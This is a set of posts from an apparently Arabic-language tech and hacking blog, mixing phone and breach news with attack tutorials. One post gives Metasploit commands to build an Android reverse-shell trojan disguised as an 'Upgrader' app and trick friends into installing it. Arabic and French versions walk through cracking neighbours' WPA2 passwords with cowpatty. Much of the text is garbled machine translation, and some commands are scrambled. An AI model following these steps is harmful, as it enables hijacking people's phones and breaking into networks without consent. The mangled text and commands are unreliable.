صورة جديدة يدعى بأنها تكشف عن دعم LG G4 لمعالج Snapdragon 808

منذ فترة ليست بالبعيدة، ظهر خبر يشير إلى إحتمالية أن يأتي هاتف LG بمعالج أنف العجل 808 G4 أنف العجل سداسي النواة بدل من 810 ثماني النواة، واليوم، تتسرب صورة يدعى بأنها تكشف عن الهاتف، والذي يشغل برنامج قياس يكشف عن المعالج الذي يعمل به هاتف LG G4 ، وهو ال أنف العجل 808!



بالرغم من أن الصورة المسربة ليست جيدة التفاصيل، فضلا عن كونها لاتكشف تماما عن شكل الهاتف، إلا أن الخبر لو صح، فلن يكون ذلك بالشيء المشجع جدا، ذلك لأن معالج أنف العجل 808 يعمل بنواتي اللحاء A57 فقط، بالإضافة إلى أربع نوى اللحاء A53 ، وليس كال أنف العجل 810، الذي يحمل أربع نوى من كل نوع، بالتالي هو يوفر أداء أكثر كفاءة من أخيه أنف العجل 808 فضلا عن إفتقار ألأخير لمعالج الرسوم الكظر 420 الأقوى من كوالكوم، ودعمه لمعالج الرسوم الكظر 418 الذي يعد أقل كفاءة من نظيره الأول، لكنه أعلى كفاءة من نظيره الأسبق الكظر 330.

يجدر الذكر إلى أن قراءة البرنامج لدقة التصنيع على أنها 28 نانومتر يثير الحيرة، حيث يجب أن تكون 20 نانومتر، هذا وينتظر موعد الإعلان الرسمي عن الهاتف بتأريخ 28 من شهر أبريل الجار للتعرف على حقيقة الأمر.

الموسوعة العلمية

4/18/2015 12:36:00 ص

أكمل القراءة

كيفية اختراق باسورد الويفي بالباك تراك

كجزء من سلسلة بلدي على القرصنة واي فاي المقترحة علي احد المواقع الاجنبية والتي اجتهد لانقل لكم ماطاب منها ، وأريد أن تثبت قطعة  ممتازة من قرصنة البرمجيات لتكسير كلمات السر WPA2-PSK.
في هذا البرنامج التعليمي، سوف نستخدم قطعة من البرمجيات التي وضعتها الباحثة في أمن الشبكات اللاسلكية جوشوا رايت ودعا لCowpatty (في كثير من الأحيان بأسلوب منمق كما CoWPAtty). هذا التطبيق يبسط ويسرع القاموس / هجوم ضد الهجين كلمات السر WPA2، لذلك دعونا نصل الى ذلك!

الخطوة 1: العثور على Cowpatty
Cowpatty هي واحدة من مئات القطع من البرامج التي تم تضمينها في جناح بكترك من البرمجيات. لسبب ما، لم يكن وضعها في/pentest/wireless، ولكن بدلا من ذلك تركت في /usr/local/bin، لذلك دعونا التنقل هناك.

• cd /usr/local/bin

لأن cowpatty هو في /usr/local/bin وينبغي أن يكون هذا الدليل في PATH الخاص بك، يجب أن نكون قادرين على تشغيلها من أي دليل في بكترك.

الخطوة 2: العثور على شاشة Cowpatty المساعدة
للحصول على الاختصار rundown من الخيارات cowpatty، اكتب ببساطة:

cowpatty

بكترك سوف توفر لك مساعدة الشاشة المختصرة. خذ علما بأن cowpatty يتطلب كل ما يلي.

• قائمة الكلمات
• ملف حيث تم القاء القبض password hash
• وSSID لل target AP

الخطوة 3: ضع محول لاسلكي في وضع مراقب
كما هو الحال في تكسير مع ايركراك-نغ، نحن بحاجة إلى وضع محول لاسلكي في وضع الشاشة.

airmon-ng start wlan0

الخطوة 4: بدء ملف التقاط

ونحن بحاجة للبدء في ملف التقاط حيث سيتم تخزين hashed password عندما كنا التقاطه  4-way handshake.

اذا كان السطر في الاعلي غير مفهوم انظر اليه هنا بالغة الانجليزية 

 we need to start a capture file where the hashed password will be stored when we capture the 4-way handshake.

• airodump-ng --bssid 00:25:9C:97:4F:48 -c 9 -w cowpatty mon0

هذا وسوف تبدأ تفريغ على AP المحدد (00: 25: 9C: 97: 4F: 48)، على قناة مختارة (-c 9) وحفظ تجزئة في ملف اسمه cowcrack.

خطوة 5: القبض على المصافحة Capture the Handshake
الآن عندما يتصل شخص ما إلى AP، ونحن سوف نلتقط التجزئة وسوف airdump-NG تبين لنا انه تم القاء القبض عليه في الزاوية العليا اليمنى.

خطوة 6: تشغيل Cowpatty

الآن أن لدينا تجزئة كلمة السر، فإننا يمكن استخدامه مع cowpatty وقائمة الكلمات جهدنا لكسر التجزئة.

• cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2

كما ترون في الصورة أعلاه، cowpatty يولد تجزئة من كل كلمة على لوائح الكلمات لدينا مع SSID كبذرة ومقارنتها تجزئة القبض عليه. عندما تتطابق التجزئة، فإنه dsplays كلمة مرور AP.

خطوة 7: جعل التجزئة الخاصة بك

وعلى الرغم من تشغيل cowpatty يمكن أن تكون بسيطة نوعا ما، كما يمكن أن يكون بطيئا جدا. وتجزئتهpassword hash مع SHA1 مع بذرة من SSID. وهذا يعني أن نفس كلمة المرور على معرفات مجموعة الخدمات المختلفة سوف تولد تجزئات مختلفة. هذا يمنعنا من ببساطة باستخدام جدول rainbow ضد كل نقاط وصول. Cowpatty يجب أن تأخذ في قائمة كلمات المرور التي تقدمها وحساب التجزئة مع SSID لكل كلمة. هذا هو وحدة المعالجة المركزية مكثفة جدا وبطيئة.

يدعم Cowpatty الآن باستخدام ملف التشويش المحسوبة مسبقا بدلا من ملف كلمة نص عادي، مما يجعل من تكسير كلمة السر WPA2-PSK 1000X أسرع! هي ملفات computed hash مسبقا المتاحة من كنيسة واي فاي، ويتم إنشاء هذه الملفات computed hash مسبقا باستخدام 172،000 القاموس الملف و1،000 معرفات مجموعة الخدمات الأكثر شعبية. مفيدة مثل هذا هو، إذا SSID الخاص بك ليست في ذلك 1،000، قائمة تجزئة حقا لا تساعدنا.

في هذه الحالة، نحن بحاجة لتوليد التجزئة الخاصة بنا لدينا SSID الهدف. يمكننا أن نفعل هذا باستخدام تطبيق يسمى genpmk. يمكننا توليد ملف تجزئة لدينا ل"darkcode" قائمة الكلمات لSSID "Mandela2" بكتابة:

• genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2

خطوة 8: استخدام لدينا تجزئة

بعد أن نكون قد ولدت التجزئة لدينا لمعرفات مجموعة الخدمات معينة، يمكننا ثم كسر كلمة السر مع cowpatty بكتابة:

cowpatty -d hashfile -r -s SSID dumpfile

ترقبوا المزيد اللاسلكية دليل التقطيع

نعتذر عن بعض الاخطاء الموجودة في الموضوع ونقترح عليكم الموضوع في شكله الاصلي بالغة الانجليزية علي الرابط التالي : رابط الموضوع الاصلي

الموسوعة العلمية

2/22/2015 11:41:00 م

أكمل القراءة

How to Hack Wi-Fi: Cracking WPA2-PSK Passwords with Cowpatty

Dans le cadre de ma série sur le piratage Wi-Fi, je veux démontrer un autre excellent morceau de piratage de logiciels pour le craquage de mots de passe WPA2-PSK. Dans mon dernier post, nous  craqué WPA2 utilisant aircrack-ng . Dans ce tutoriel, nous allons utiliser un logiciel développé par le chercheur en sécurité sans fil Joshua Wright appelé  Cowpatty  (souvent stylisée que CoWPAtty). Cette application simplifie et accélère le dictionnaire / attaque hybride des mots de passe WPA2, alors allons-y à elle!

Étape 1: Trouver la Cowpatty

Cowpatty est l'une des centaines de morceaux de logiciel qui sont inclus dans la suite BackTrack de logiciels. Pour une raison quelconque, il n'a pas été placé dans la / pentest / sans fil  répertoire, mais a été laissé dans le  répertoire / usr / local / bin répertoire, alors allons-y naviguer.

cd / usr / local / bin

Parce Cowpatty est dans la  usr / local / bin /  répertoire et ce répertoire ne devrait pas être dans votre PATH, nous ne devrions pas être en mesure d'exécuter à partir de ne importe quel répertoire dans BackTrack.

Étape 2: Trouver l'écran Cowpatty Aide

Pour obtenir un bref aperçu des options cowpatty, tapez simplement:

cowpatty

BackTrack vous donner un bref écran d'aide. Prenez note que cowpatty nécessite tous les éléments suivants.

une liste de mots

un fichier où le hash du mot de passe a été capturé

le SSID de l'AP cible

Étape 3: Placez l'adaptateur sans fil en mode moniteur

Tout comme dans  la fissuration avec aircrack-ng , nous devons mettre l'adaptateur sans fil en mode moniteur.

airmon-ng start wlan0

Étape 4: Lancer un fichier de capture

Ensuite, nous devons commencer à un fichier de capture où le mot de passe haché sera enregistrée nous capturons le 4-way handshake.

airodump-ng --bssid 00: 25: 9C: 97: 4F: 48 -c 9 -w cowpatty mon0

Cela va démarrer une décharge sur l'AP sélectionné ( 00: 25: 9C: 97: 4F: 48 ), sur le canal sélectionné ( -c 9 ) et enregistrez le hachage dans un fichier nommé  Cowcrack .

Étape 5: Capture the Poignée de main

Maintenant, quand quelqu'un se connecte à l'AP, nous capturons le hachage et airdump-ng allons nous montrer qu'il a été capturé dans le coin supérieur droit.

Étape 6: Exécutez le Cowpatty

Maintenant que nous avons le hash du mot de passe, nous pouvons l'utiliser avec cowpatty et de notre liste de mots pour casser le hachage.

• cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r -s /root/cowcrack-01.cap Mandela2

Comme vous pouvez le voir dans la capture d'écran ci-dessus, cowpatty génère un hachage de chaque mot sur notre liste de mots avec le SSID comme une graine et en le comparant au hachage capturé. Lorsque les hash correspondent, il dsplays le mot de passe de l'AP.

Étape 7: Faites votre propre Hash

Bien que fonctionnant cowpatty peut être assez simple, il peut aussi être très lent. Le mot de passe est haché avec hachage SHA1 avec une graine du SSID. Cela signifie que le même mot de passe sur différents SSID va générer différents hachages. Cela nous empêche de simplement en utilisant une table arc contre tous les points d'accès. Cowpatty doit prendre la liste de mot de passe que vous fournissez et calculer le hachage avec le SSID pour chaque mot. Ce est beaucoup de temps CPU et lent.

Cowpatty prend désormais en utilisant un fichier pré-calculé hachage plutôt qu'un fichier de texte en texte brut, ce qui rend le craquage du mot de passe WPA2-PSK 1000x plus rapide! Fichiers de hachage calculées pré sont disponibles auprès de l'  Eglise du WiFi , et ces fichiers pré-calculées hachage sont générées en utilisant 172000 fichier de dictionnaire et les 1000 SSID plus populaires. Aussi utile que ce est, si votre SSID est pas dans ce 1000, la liste de hachage vraiment ne nous aide pas.

Dans ce cas, nous devons générer nos propres tables de hachage pour notre SSID cible. Nous pouvons le faire en utilisant une application appelée  Genpmk . Nous pouvons générer notre dossier de hachage pour la «darkcode" liste de mots pour le SSID "Mandela2" en tapant:

genpmk -f -d /pentest/passwords/wordlists/darkc0de.lst hachages -s Mandela2

Étape 8: Utilisation Notre Hash

Une fois que nous avons généré nos hashs des SSID particuliers, nous pouvons alors casser le mot de passe avec cowpatty en tapant:

cowpatty -d -r hashfile dumpfile -s ssid

Restez connectés pour plus Guides de piratage sans fil

الموسوعة العلمية

2/22/2015 11:37:00 م

أكمل القراءة

طريقة اختراق هواتف الاندرويد عن طريق صناعة تطبيق بالكالي لينيكس

مرحبا بكم في هذه المشاركة : هذا هو البرنامج التعليمي شرح كيفية إختراق هواتف الاندرويد مع كالي.
 لا توجد دروس تفسير هذا الاختراق / استغلال، لذلك، أنا قدمت واحدة. (ومع ذلك، قد تعرف بالفعل عن هذا) وهو منقول عن احد المواقع الاجنبية بطريقة خاصة وبتعبير خاص من اعدادي كما انني لم اجربه حتي الان وساضع رابط شرح الطريقة بالغة الام لتفادي الاخطاء كما ارجوا عدم استخدام الاطريقة لاغراض ظارة هذا ان كانت صحيحة 
الخطوة الاولي
فتح معبر او محطة terminal، وصنع تورجان .apk
ثم نكتب الامر التالي مع تغير LHOST بال ip الخاص بنا
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk

يمكنك أيضا الإختراق الروبوت على WAN i.e. من خلال استخدام الشبكة الخاص بك ومشاركته مع العامة / IP الخارجي في LHOST واعادة توجيه منفذ 

خطوة 2: فتح محطة أخرى:

تفعيل metasploit console، بكتابة: msfconsole

الخطوة 3: انشاء مستمع:

بعد القيام بالتحميل (الامر سيستغرق وقتا)، نحمل معالج متعدد للاختراق وذلك بكتابة: use exploit/multi/handler

انشاء  reverse payload بكتابة: set payload android/meterpreter/reverse_tcp

لتعيين L نوع المضيف:  set LHOST 192.168.0.4 حتي وان كان الاختراق علي شبكتك

الخطوة 4: استغلال!
في نوع آخر: استغلال لبدء المستمع.
نسخ التطبيق الذي قمت به (Upgrader.apk) من المجلد الاصلي الي هاتفك الاندرويد .



ثم إرساله باستخدام تحميلها على دروببوكس أو أي موقع تقاسم (مثل: www.speedyshare.com).
ثم إرسال رابط الموقع أن أعطى لك إلى أصدقائك واستغلال هواتفهم (فقط على LAN، ولكن إذا كنت تستخدم طريقة WAN ثم يمكنك استخدام استغلال أي مكان على الإنترنت)

السماح للضحية بتثبيت التطبيق Upgrader (كما قد يعتقد أنها تهدف إلى رفع مستوى بعض الميزات على هاتفه)
ومع ذلك، ينبغي تمكين خيار مخصص لتركيب التطبيقات من مصادر غير معروفة (إن لم يكن) من إعدادات الأمان من هاتف الاندرويد للسماح بثبيت التورجان .
وعندما ينقر المفتوح ...
خطوة 5: BOOM!
هنا يأتي موجه meterpreter



وفي الاخير تكون قد اتمت جميع العمليات ومبروك عليك الاختراق

الموسوعة العلمية

2/17/2015 02:08:00 ص

أكمل القراءة

افظل تطبيق لايجاد باسورد الويفي (مجرب وفعال)

السلام عليكم 

طريقة ايجاد باسورد الويفي عن طريق تطبيق wifi map 

في موضوع اليوم سنتطرق واياكم الي تطبيق رائع علي هواتف التي تعمل بنظام الاندرويد و الابس ستورن وهو تطبيق رائع يساعد في فك باسورد الويفي  حتي دون اللجوء الي الاختراق واستعمال كالي او باك تراك او اي نظام مساعد في الاختراق وبطريقة قانونية وهذا يكفي ان تتوفر علي هاتف ذكي من النسخ الحديثة لان التطبيق لا يعمل علي الانظمة القديمة 

لقد جربت التطبيق بنفسي علي واشغل معي وتمكنت من تووفر علي مجموعة من البسواردات الخاصة بسكان الحي الذي اعيش فيه وهو بالفعل يعمل 

وطريقة العمل علي التطبيق هي بان تشغل الويفي في جهازك وتشغل الGPS لتحديد المواقع او يمكنك تشغيل اداة مرور البيانات ثم تدخل الي التطبيق وتظغط علي رمز السهم لتحديد موقعك ومن هناك سيخبرك عن كل نقاط الويفي القريبة منك تظغط عليها لتجد الباسورد مكتوب

  يمكنك تحميل التطبيق من رابط التالي  wifi map

الموسوعة العلمية

2/16/2015 08:26:00 م

أكمل القراءة

قراصنة التكنولوجيا الفائقة سرقة -300 ملايين دولار من 100 من البنوك

في نهاية هذا الاسبوع، نشرت صحيفة نيويورك تايمز تفاصيل حملة جنائية التكنولوجيا الفائقة والتي شهدت البنوك في روسيا، واليابان، وأوروبا والولايات المتحدة تعرضت لهجوم كبير البرمجيات الخبيثة وسرقة الملايين من الدولارات.
القصة، التي انبثقت عن تقرير كاسبرسكي التي كانت مشتركة مع صحيفة قبل نشره رسميا، تلقى طبيعي انتباه الآخرين في وسائل الإعلام:

وقال كاسبرسكي كريس دوجيت صحيفة نيويورك تايمز أن الهجوم - الذي تمارسه عصابة ما يسمى ب "Carbanak"  "من المرجح انه الهجوم الأكثر تطورا الذي شهده العالم حتى الآن من حيث التكتيكات والأساليب التي استخدمت من المجرمين الإلكترونيين علي أن تبقى سرية. "
في ديسمبر، وصفت روسيا قرصنة عصابة كيف سرقت الملايين من البنوك، واستهداف أنظمة الدفع الإلكتروني وحتى تركيب البرمجيات الخبيثة على أجهزة الصراف الآلي البنية التحتية لإدارة التي أسفرت عن سرقة من اجهزة الصراف.

العصابة كان اسمها  "Anunak" والتي تم الكشف عنها من قبل باحثين في المجموعة-IB وفوكس-IT، الذي كشف لأول مرة الحملة التي أفيد أيضا عن طريق أمثال فوربس في ذلك الوقت.
كما هو الظن عند بعض الخبراء ان  Anunak وCarbanak واحدة وهي نفس العصابة. تقرير كاسبرسكي ربما يكون قد أمسك انتباه أمثال نيويورك تايمز، ولكن الآن يبدو أن ما هو "جديد" هو فقط أن المزيد من البنوك أصيبت من قبل المتسللين من أكد في وقت سابق، والمزيد من المال سرقت

فمن العار أن صحيفة نيويورك تايمز لا تشير الي أبحاث سابقة قام بها فوكس-IT والمجموعة-IB، وبدلا من ذلك يعطي كل دائرة الضوء للباحثين في كاسبرسكي .

شيء الوحيد المؤكد. البنوك بحاجة للحفاظ على سرعة دهائهم وعلاج الأمن كأولوية عالية، كما أصبح القراصنة أكثر تطورا من أي وقت مضى والجريئة في محاولاتهم لسرقة النقدية.

الموسوعة العلمية

2/15/2015 09:52:00 م

أكمل القراءة

4 كتب للتوسع في مجال الامن المعلوماتي و الاختراق

ان تكون هاكر متقدم ، هذا يعني انك هاكر دارس ومتمرس ، الاشخاص الذين لم يدرسوا كتبا ولم يمارسوا ماتعلموه ، هاؤلاء الاشخاص لايمكن ان يصطلح عليهم هاكرز ، بل ولهم عدة تصنيفات اخرى حددها لهم العالم الاسود والتي تتماشى مع "مهاراتهم المكتسبة " . 

ومادام ان الإختراق والحماية يلزمها منهج علمي من اجل إحترافها ، فلابد عليك عزيزي القارئ على الاقل ان تدرس بعض الكتب والتي ستنقلك رويضا رويضا من البداية و إلى الإحتراف . لهذا إخترت لك في هذه التدوينة مجموعة متنوعة من الكتب والتي رتبتها من مستوى المبتدئين وإلى مستوى المحترفين . 

الكتاب الاول : Hacking for Dummies

أنصحك بهذا الكتاب كأول كتاب تدرسه ، ذلك لأنه ينتقل معك من الــ 0 كما انه سيساعدك في بناء مهاراتك الخاصة ومنحك اسلوبا ممنهجا في فهم إستراتيجيات كشف الثغرات الامنية وكذلك التبليغ عنها . هذا الكتاب سيجعلك قادر على فهم اساليب الهندسة الإجتماعية وكذلك طرق الحماية منها . الكتاب يوجد منه نسخ باللغة الفرنسية وهي : Le piratage pour les nuls

الكتاب الثاني : Unrevealed Secrets of Hacking and Cracking PB

بعد إنتهائك من قراءة الكتاب الاول ، انصحك بهذا الكتاب فهو سيقربك اكثر من ادوات الإختراق وكذلك المشاريع التي تستخدم في هذا الإطار . كما انك ستتعلم مع هذا الكتاب ميتودولوجيا الإختراق ، اي المراحل التي يمكن تتبعها من اجل القيام بعملية إختراق ناجحة . 

الكتاب الثالث : Gray Hat Hacking: The Ethical Hackers Handbook

سننتقل الآن إلى الشبكات ، واتمنى انك ان تكون قد درست بعض التقنيات في هذا المجال قبل المرور إلى دراسة هذا الكتاب . ، لانه لايمكنك ان تفهم هذا الكتاب إذا لم تكن دارس للشبكات . غير ذلك فهذا الكتاب يعلمك طرق الكشف عن الثغرات الامنية في الشبكات وإختراقها ، بالإضافة كذلك إلى تعلم بعض تقنيات الــ cutting-edge .

الكتاب الرابع : Metasploit: The Penetration Tester's Guide

هذا الكتاب يقربك اكثر من المشروع العملاق Metasploit ،  فوه يعلمك كيف تتعامل مع مختلف الادوات الموجودة في هذا النظام ، كشف الثغرات الامنية وكذلك إستغلالها بإستعمال الميتاسبلويت . فهذا الكتاب يعلمك اكثر من الجانب التطبيقي ولايهتم بشكل كبير بالجانب النظري .

اتمنى منك الإهتمام بدراسة هذه الكتب ، واضرب لكم موعد مع كتب أخرى ساشارككم إياها من مكتبتي الخاصة لمن يود ان يتقدم في مجال الإختراق والحماية ، ورجاء يجب التنويه ان هذه الكتب تستلزم منك مهارات في إدارة الشبكات والانظمة وكذلك في لغات البرمجة لكي تستطيع فهم مضمون هذه الكتب . غير ذلك فالاتطلبوا مني طرح روابط تحميل لان ذلك غير قانوني لانها ليست مجانيةفي هذه التدوين ، لكن في المقابل يمكنكم البحث عنها في الانترنت فهي موجودة بالمجان . واتمنى ان اكون قد ساعدتكم في هذه التدوينة ، في إنتظار إرتساماتكم واسئلتكم .

الموسوعة العلمية

1/28/2015 11:23:00 م

أكمل القراءة

ثغرة جديدة علي متصفحات اندرويد تصيب عدد كبير من الضحايا علي الفيسبوك

السلام عليكم 

تم اكتشاف ثغرة أمنية خطيرة في متصفح الويب الافتراضي لنظام التشغيل أندرويد أقل من 4.4 يعمل على عدد كبير من أجهزة الروبوت التي تسمح للمهاجمين لتجاوز سياسة المنشأ نفسه (SOP).

تم الكشف عن الاندرويد في نفس سياسة المنشأ (SOP) الضعف (CVE-2014-6041) أولا الحق في بداية سبتمبر 2014

باحثة أمنية مستقلة رفاعي البلوش. وجدت أن AOSP (الاندرويد  منصة مفتوحة المصدر) متصفح المثبتة على الروبوت 4.2.1 عرضة لنفس اسياسة المنشأ (SOP) تجاوز الخلل الذي يسمح لموقع واحد سرقة البيانات من الآخر.

وقد اكتشف باحثوا الأمن في Trend micro بالتعاون مع الفيسبوك العديد من مستخدمي الفيسبوك تم استهدافهم من قبل الهجمات الإلكترونية التي تحاول بنشاط لاستغلال هذا الخلل المعين في متصفح الويب لأن Metasploit استغلال متاح للجمهور، الأمر الذي جعل استغلال الضعف بكثير أسهل.

سياسة المنشأ نفسه هي واحدة من المبادئ التوجيهية التي تسعى إلى حماية تجربة تصفح المستخدمين. تم تصميم SOP في الواقع لمنع صفحات من التعليمات البرمجية تحميل التي ليست جزءا من مواردها الخاصة، وضمان أن لا طرف ثالث يمكن حقن كود دون إذن من صاحب الموقع.

للأسف، كان SOP الضحية الضعف البرمجة عبر الموقع في الإصدارات القديمة من الهواتف الذكية الروبوت التي تساعد المهاجمين لخدمة الضحايا وضع ملف جافا سكريبت الخبيث المخزن في حساب سحابة التخزين.

في هذا الهجوم معين، وسيتم تقديم وصلة باستخدام صفحة الفيسبوك الخاصة التي يمكن أن تؤدي مستخدمي الفيسبوك إلى موقع على شبكة الانترنت الخبيثة.

ومع ذلك، فإن "الصفحة تحتوي على غموض شفرة جافا سكريبت، والذي يتضمن محاولة لتحميل الفيسبوك URL في الإطار الداخلي. سوف يرى المستخدم فقط صفحة فارغة كما تم تعيين الصفحة لHTML عدم عرض أي شيء عن طريق شعبة الوسم لها، في حين أن الإطار الداخلي لديها حجم بكسل واحد "، وكتب سايمون هوانغ، وهو مهندس الأمني المتنقل في Trend micro، في بلوق وظيفة.

شفرة جافا سكريبت قد تسمح للمهاجمين لأداء المهام المختلفة على حساب الضحية الفيسبوك، نيابة عن صاحب الحساب الشرعي. ووفقا للباحث، يمكن للقراصنة تفعل أي شيء تقريبا مع حساب الفيسبوك اخترق باستخدام شفرة جافا سكريبت. وفيما يلي بعض الأنشطة على النحو التالي:

مضيفا الأصدقاء

مثل واتبع أي صفحة الفيسبوك

تعديل الاشتراكات

يأذن تطبيقات الفيسبوك للوصول إلى ملفه الشخصي للمستخدم، وقائمة الأصدقاء والمعلومات عيد ميلاد، الليكات.

لسرقة الرموز وصول الضحية وتحميلها على الخادم الخاص بهم.

جمع بيانات التحليل (مثل موقع الضحايا، HTTP المرجعية، الخ) باستخدام خدمة المشروعة.

وقد لاحظ الباحثون الأمن أن المحتالين عبر الإنترنت وراء هذه الحملة تعتمد على التطبيق الرسمي بلاك بيري التي تحتفظ بها من أجل سرقة رموز الوصول المميزة، وبالتالي القرصنة حسابات الفيسبوك. باستخدام اسم مطور موثوق مثل بلاك بيري، المهاجم يريد الحملة أن تظل التي لم يتم كشفها. ذكرت Trend micro بلاك بيري حول النتائج التي توصلوا إليها.

واضاف ان "البرمجيات الخبيثة المحمول باستخدام الاندرويد SOP استغلال (الروبوت نفس المصدر السياسة تجاوز استغلال) مصممة لاستهداف مستخدمي الفيسبوك بغض النظر عن برنامجهم جهاز المحمول" وقال بلاك بيري Trend micro في بيان. "ومع ذلك، فإنه يحاول الاستفادة من اسم العلامة التجارية بلاك بيري موثوق به عن طريق استخدام الفيسبوك على شبكة الإنترنت التطبيق. وتعمل بلاك بيري باستمرار معTrend micro والفيسبوك لكشف والتخفيف من هذا الهجوم. لاحظ أن المسألة ليست نتيجة لاستغلال لفي بلاك بيري الأجهزة والبرامج، أو شبكة ".

وتعمل Trend micro جنبا إلى جنب مع الفيسبوك والبلاك بيري في محاولة للكشف عن الهجوم ومنع الهجوم من التي يجري تنفيذها ضد المستخدمين الروبوت الجديد.

جميع أجهزة الأندرويد تصل أندرويد 4.4 كيت كات عرضة لهذه الثغرة الأمنية SOP. ومع ذلك، فقد عرضت التصحيح من قبل جوجل في سبتمبر، ولكن الملايين من مستخدمي الهواتف الذكية الروبوت لا تزال عرضة للهجوم لأن الصانعة للهاتف الذكي لم يعد يدفع التحديث لعملائها أو الجهاز نفسه لا يدعم طبعة أحدث من نظام التشغيل.

يوجد الضعف SOP في المتصفح لأجهزة الروبوت، والتي لا يمكن إلغاء تثبيت لانها عادة ما تكون جزءا من نظام التشغيل ميزة في البناء. لذلك، من أجل حماية نفسك، فقط تعطيل المتصفح من أجهزة الروبوت الخاص بك عن طريق الذهاب إلى الإعدادات> التطبيقات> جميع وتبحث عن الرمز الخاص به. قبل فتحه، ستجد زر تعطيل، حدده ثم تعطيل متصفح.

الموسوعة العلمية

12/31/2014 11:28:00 م

أكمل القراءة

قراصنة سربوا 13،000 كلمات السر من أمازون، وول مارت وبرازرز

السلام عليكم

لقد تسربت اليوم بتاريخ 26-12-2014 مجموعة كبيرة من كلمات مرور لحسابات علي مواقع الشعبية ومجمعة من ارقام بطاقات الائتمان وتواريخ نهاية الصلاحية

التسريبات جاءت من مواقع تديرها سلسلة من المواد الإباحية إلى الألعاب إلى التسوق عبر الإنترنت. 

الأمازون
وول مارت
شبكة بلاي ستيشن
إكس بوكس ​​لايف
Twitch.tv
ديل
برازرز
DigitalPlayground
ونرى قائمة كاملة 

وكانت في شكل وثائق كبيرة وضعت علي مواقع تبادل المعلومات 

لمجرد أن يكون على الجانب أكثر أمانا، وينصح المستخدمين لتغيير كلمات المرور الخاصة بهم إذا كان لديهم حسابات على هذه المواقع للخطر، وكذلكإيلاء الاهتمام لمعاملات بطاقات الائتمان الخاصة بك ، وإذا وجدت أي نشاط مشبوه، والتواصل مباشرة مع البنوك والمؤسسات المالية ذات الصلة.

أيضا، لا تستخدم نفس كلمة السر للأعمال المصرفية ومواقع التسوق عبر الانترنت، ودائما ترقب للأنشطة غير عادية أو شراء غير مصرح بها مع حساباتك.

الموسوعة العلمية

12/27/2014 08:49:00 م

أكمل القراءة